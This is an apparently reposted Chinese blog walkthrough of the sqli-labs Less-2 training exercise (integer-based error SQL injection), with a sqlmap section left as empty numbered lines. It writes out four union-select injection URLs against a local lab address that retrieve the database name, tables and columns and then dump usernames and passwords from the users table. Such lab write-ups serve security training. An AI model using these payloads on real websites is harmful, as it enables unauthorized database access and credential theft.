当前位置:网站首页>sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)
sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)
2022-08-08 21:59:00 【XLXLXL.】
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)
1 hackbar注入
输入‘发现页面出错 此处应该有sql注入
通过比较可以得出此处是整型注入
然后进行union联合查询
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+
查出库的名称是security
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security‘ --+
对user表进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘users’–+
对username password进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(‘用户名:’,username,‘密码:’,password) from users --+
拿到数据 结束
2 .sqlmap使用
1
2
3 
4
5.
拿到数据 结束
边栏推荐
猜你喜欢
![17 [2D conversion 3D conversion browser private prefix]](/img/d0/2b310e6b6b375d457f339a6a9d71e1.png)
随机推荐
"New Infrastructure of Cultural Digital Strategy and Ecological Construction of Cultural Art Chain" was successfully held
Feign如何针对单个服务屏蔽Hystrix熔断功能
音视频技术开发周刊 | 257
奈雪在亏损,背后供应商赢麻了
Zero Digital Reports Digital Financial Innovation to the Secretary of Hainan Provincial Party Committee
ZERO Technology "Chain on the South"——deeply cultivated in the field of digital finance
测试/开发程序员,如何跳出技术瓶颈?一年两年......
文件上传接入阿里云OSS
【计网】(五)网络层首部
看到这个应用上下线方式,不禁感叹:优雅,太优雅了!
打印机的使用
基于阿里云的基础架构设施保障(一)IAAS云计算
Chrome代理管理器插件
software design principles
为什么要做LiveVideoStack课程?
2.1.5 折叠剪切展开问题
JQGrid通过json请求nodejs数据,表格信息保存在mysql数据库中
Conformer论文以及代码解析(上)
零数科技受邀出席2019全球未来出行大会
中断系统结构及中断控制详解